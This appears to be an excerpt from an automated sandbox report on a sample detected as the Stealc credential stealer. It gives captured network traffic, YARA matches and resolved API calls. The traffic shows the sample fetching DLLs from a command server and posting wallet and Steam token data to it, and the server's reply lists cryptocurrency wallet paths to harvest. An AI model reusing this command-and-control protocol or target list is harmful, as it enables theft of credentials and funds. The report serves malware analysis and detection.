`.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Sep 26, 2024 11:33:36.099595070 CEST	94	OUT	GET /0d60be0de163924d/softokn3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 26, 2024 11:33:36.318475962 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 09:33:36 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes Content-Length: 257872 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Sep 26, 2024 11:33:36.604240894 CEST	98	OUT	GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 26, 2024 11:33:36.821548939 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 09:33:36 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "13bf0-5e7e950876500" Accept-Ranges: bytes Content-Length: 80880 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Sep 26, 2024 11:33:37.309319019 CEST	202	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FBFIDBFHDBGIDHJJEGHI Host: 185.215.113.37 Content-Length: 1067 Connection: Keep-Alive Cache-Control: no-cache
Sep 26, 2024 11:33:38.211225986 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 09:33:37 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=84 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 26, 2024 11:33:38.285521030 CEST	468	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJKEHIIJJECFHJKECFHD Host: 185.215.113.37 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 62 35 33 36 30 35 30 38 31 37 31 62 35 65 33 62 38 34 38 64 37 62 37 38 31 38 66 63 64 62 35 61 30 32 64 65 34 30 33 30 64 65 39 37 36 63 33 33 61 64 35 66 65 61 32 63 35 35 61 31 62 39 64 64 64 35 31 38 62 37 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 2d 2d 0d 0a Data Ascii: ------KJKEHIIJJECFHJKECFHDContent-Disposition: form-data; name="token"25b5360508171b5e3b848d7b7818fcdb5a02de4030de976c33ad5fea2c55a1b9ddd518b7------KJKEHIIJJECFHJKECFHDContent-Disposition: form-data; name="message"wallets------KJKEHIIJJECFHJKECFHD--
Sep 26, 2024 11:33:38.505789995 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 09:33:38 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 2408 Keep-Alive: timeout=5, max=83 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED] Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
Sep 26, 2024 11:33:38.508266926 CEST	473	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HJJEHJJKJEGHJJKEBFBG Host: 185.215.113.37 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 45 48 4a 4a 4b 4a 45 47 48 4a 4a 4b 45 42 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 62 35 33 36 30 35 30 38 31 37 31 62 35 65 33 62 38 34 38 64 37 62 37 38 31 38 66 63 64 62 35 61 30 32 64 65 34 30 33 30 64 65 39 37 36 63 33 33 61 64 35 66 65 61 32 63 35 35 61 31 62 39 64 64 64 35 31 38 62 37 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 45 48 4a 4a 4b 4a 45 47 48 4a 4a 4b 45 42 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 45 48 4a 4a 4b 4a 45 47 48 4a 4a 4b 45 42 46 42 47 2d 2d 0d 0a Data Ascii: ------HJJEHJJKJEGHJJKEBFBGContent-Disposition: form-data; name="token"25b5360508171b5e3b848d7b7818fcdb5a02de4030de976c33ad5fea2c55a1b9ddd518b7------HJJEHJJKJEGHJJKEBFBGContent-Disposition: form-data; name="message"ybncbhylepme------HJJEHJJKJEGHJJKEBFBG--
Sep 26, 2024 11:33:38.731199026 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 09:33:38 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 5801 Keep-Alive: timeout=5, max=82 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 2a 2e 70 6c 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 61 72 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 62 72 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 65 63 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 65 67 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 69 6e 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 70 74 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 61 63 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 62 64 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f [TRUNCATED] Data Ascii: .pl<br> 1.google.com.google.com<br>.ar<br> 1.google.com.google.com<br>.br<br> 1.google.com.google.com<br>.ec<br> 1.google.com.google.com<br>.eg<br> 1.google.com.google.com<br>.in<br> 1.google.com.google.com<br>.pt<br> 1.google.com.google.com<br>.ac<br> 1.google.com.google.com<br>.bd<br> 1.google.com.google.com<br>.zm<br> 1.google.com.google.com<br>.ve<br> 1.google.com.google.com<br>.pk<br> 1.google.com.google.com<br>.rs<br> 1.google.com.google.com<br>.ph<br> 1.google.com.google.com<br>.mx<br> 1.google.com.google.com<br>.in<br> 1.google.com.google.com<br>.th<br> 1.google.com.google.com<br>.id<br> 1.google.com.google.com<br>.tr<br> 1.google.com.google.com<br>.cz<br> 1.google.com.google.com<br>.io<br> 1.google.com.google.com<br>.dz<br> 1.google.com.google.com<br>.de<br> 1.google.com.google.com<br>.kr<br> 1.google.com.google.com<br>.ma<br> 1.google.com.google.com<br>.jp<br> 1.google.com.google.com
Sep 26, 2024 11:33:38.744513988 CEST	564	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHIDHCBGDHJKEBGDGIJE Host: 185.215.113.37 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 48 49 44 48 43 42 47 44 48 4a 4b 45 42 47 44 47 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 62 35 33 36 30 35 30 38 31 37 31 62 35 65 33 62 38 34 38 64 37 62 37 38 31 38 66 63 64 62 35 61 30 32 64 65 34 30 33 30 64 65 39 37 36 63 33 33 61 64 35 66 65 61 32 63 35 35 61 31 62 39 64 64 64 35 31 38 62 37 0d 0a 2d 2d 2d 2d 2d 2d 47 48 49 44 48 43 42 47 44 48 4a 4b 45 42 47 44 47 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 48 49 44 48 43 42 47 44 48 4a 4b 45 42 47 44 47 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------GHIDHCBGDHJKEBGDGIJEContent-Disposition: form-data; name="token"25b5360508171b5e3b848d7b7818fcdb5a02de4030de976c33ad5fea2c55a1b9ddd518b7------GHIDHCBGDHJKEBGDGIJEContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------GHIDHCBGDHJKEBGDGIJEContent-Disposition: form-data; name="file"------GHIDHCBGDHJKEBGDGIJE--
Sep 26, 2024 11:33:39.463356972 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 09:33:38 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=81 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 26, 2024 11:33:39.466260910 CEST	466	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KKKKEHJKFCFCBFHIIDGD Host: 185.215.113.37 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4b 4b 45 48 4a 4b 46 43 46 43 42 46 48 49 49 44 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 62 35 33 36 30 35 30 38 31 37 31 62 35 65 33 62 38 34 38 64 37 62 37 38 31 38 66 63 64 62 35 61 30 32 64 65 34 30 33 30 64 65 39 37 36 63 33 33 61 64 35 66 65 61 32 63 35 35 61 31 62 39 64 64 64 35 31 38 62 37 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4b 4b 45 48 4a 4b 46 43 46 43 42 46 48 49 49 44 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4b 4b 45 48 4a 4b 46 43 46 43 42 46 48 49 49 44 47 44 2d 2d 0d 0a Data Ascii: ------KKKKEHJKFCFCBFHIIDGDContent-Disposition: form-data; name="token"25b5360508171b5e3b848d7b7818fcdb5a02de4030de976c33ad5fea2c55a1b9ddd518b7------KKKKEHJKFCFCBFHIIDGDContent-Disposition: form-data; name="message"files------KKKKEHJKFCFCBFHIIDGD--
Sep 26, 2024 11:33:39.687829018 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 09:33:39 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=80 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 26, 2024 11:33:39.688853025 CEST	473	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CAKEBFCFIJJKKECAKJEH Host: 185.215.113.37 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 41 4b 45 42 46 43 46 49 4a 4a 4b 4b 45 43 41 4b 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 62 35 33 36 30 35 30 38 31 37 31 62 35 65 33 62 38 34 38 64 37 62 37 38 31 38 66 63 64 62 35 61 30 32 64 65 34 30 33 30 64 65 39 37 36 63 33 33 61 64 35 66 65 61 32 63 35 35 61 31 62 39 64 64 64 35 31 38 62 37 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 45 42 46 43 46 49 4a 4a 4b 4b 45 43 41 4b 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 45 42 46 43 46 49 4a 4a 4b 4b 45 43 41 4b 4a 45 48 2d 2d 0d 0a Data Ascii: ------CAKEBFCFIJJKKECAKJEHContent-Disposition: form-data; name="token"25b5360508171b5e3b848d7b7818fcdb5a02de4030de976c33ad5fea2c55a1b9ddd518b7------CAKEBFCFIJJKKECAKJEHContent-Disposition: form-data; name="message"wkkjqaiaxkhb------CAKEBFCFIJJKKECAKJEH--
Sep 26, 2024 11:33:40.417465925 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 09:33:39 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=79 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Target ID:	0
Start time:	05:33:17
Start date:	26/09/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x3a0000
File size:	1'876'480 bytes
MD5 hash:	7F275C6ABF9EE064FEBB9736BFB047F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1753853572.0000000000F79000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1526931154.0000000004D60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1753853572.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	5.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4%
Total number of Nodes:	2000
Total number of Limit Nodes:	37

Executed Functions

Function 003B9860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(76F70000,00F30498), ref: 003B98A1
GetProcAddress.KERNEL32(76F70000,00F30408), ref: 003B98BA
GetProcAddress.KERNEL32(76F70000,00F303C0), ref: 003B98D2
GetProcAddress.KERNEL32(76F70000,00F305E8), ref: 003B98EA
GetProcAddress.KERNEL32(76F70000,00F305D0), ref: 003B9903
GetProcAddress.KERNEL32(76F70000,00F38788), ref: 003B991B
GetProcAddress.KERNEL32(76F70000,00F25BB0), ref: 003B9933
GetProcAddress.KERNEL32(76F70000,00F25C70), ref: 003B994C
GetProcAddress.KERNEL32(76F70000,00F30618), ref: 003B9964
GetProcAddress.KERNEL32(76F70000,00F305A0), ref: 003B997C
GetProcAddress.KERNEL32(76F70000,00F30528), ref: 003B9995
GetProcAddress.KERNEL32(76F70000,00F304B0), ref: 003B99AD
GetProcAddress.KERNEL32(76F70000,00F25C90), ref: 003B99C5
GetProcAddress.KERNEL32(76F70000,00F304C8), ref: 003B99DE
GetProcAddress.KERNEL32(76F70000,00F30420), ref: 003B99F6
GetProcAddress.KERNEL32(76F70000,00F25BD0), ref: 003B9A0E
GetProcAddress.KERNEL32(76F70000,00F30468), ref: 003B9A27
GetProcAddress.KERNEL32(76F70000,00F30330), ref: 003B9A3F
GetProcAddress.KERNEL32(76F70000,00F25B50), ref: 003B9A57
GetProcAddress.KERNEL32(76F70000,00F30438), ref: 003B9A70
GetProcAddress.KERNEL32(76F70000,00F25CB0), ref: 003B9A88
LoadLibraryA.KERNEL32(00F304F8,?,003B6A00), ref: 003B9A9A
LoadLibraryA.KERNEL32(00F30348,?,003B6A00), ref: 003B9AAB
LoadLibraryA.KERNEL32(00F30360,?,003B6A00), ref: 003B9ABD
LoadLibraryA.KERNEL32(00F304E0,?,003B6A00), ref: 003B9ACF
LoadLibraryA.KERNEL32(00F30540,?,003B6A00), ref: 003B9AE0
GetProcAddress.KERNEL32(76DA0000,00F30570), ref: 003B9B02
GetProcAddress.KERNEL32(75840000,00F30588), ref: 003B9B23
GetProcAddress.KERNEL32(75840000,00F38CD0), ref: 003B9B3B
GetProcAddress.KERNEL32(753A0000,00F38D60), ref: 003B9B5D
GetProcAddress.KERNEL32(77300000,00F25D50), ref: 003B9B7E
GetProcAddress.KERNEL32(774D0000,00F38748), ref: 003B9B9F
GetProcAddress.KERNEL32(774D0000,NtQueryInformationProcess), ref: 003B9BB6

Strings

NtQueryInformationProcess, xrefs: 003B9BAA

Memory Dump Source

Source File: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.1752823658.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000432000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000451000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000045D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000545000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000005FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000089B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000008AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753454051.00000000008AB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753638589.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753659356.0000000000A4F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: NtQueryInformationProcess
API String ID: 2238633743-2781105232
Opcode ID: c79af111788a3ca4b5682e1b95b6cbbd21211726ae5ab8df75f08ee5c3dfee44
Instruction ID: aeab44a6b24a52752db072752ebe77258be85597514771e1a92dcaff5cb72e5b
Opcode Fuzzy Hash: c79af111788a3ca4b5682e1b95b6cbbd21211726ae5ab8df75f08ee5c3dfee44
Instruction Fuzzy Hash: 14A19FB95042C09FC35CDFB8EDC89563BF9F7AC301705851AA685CB225D739B48AEB12

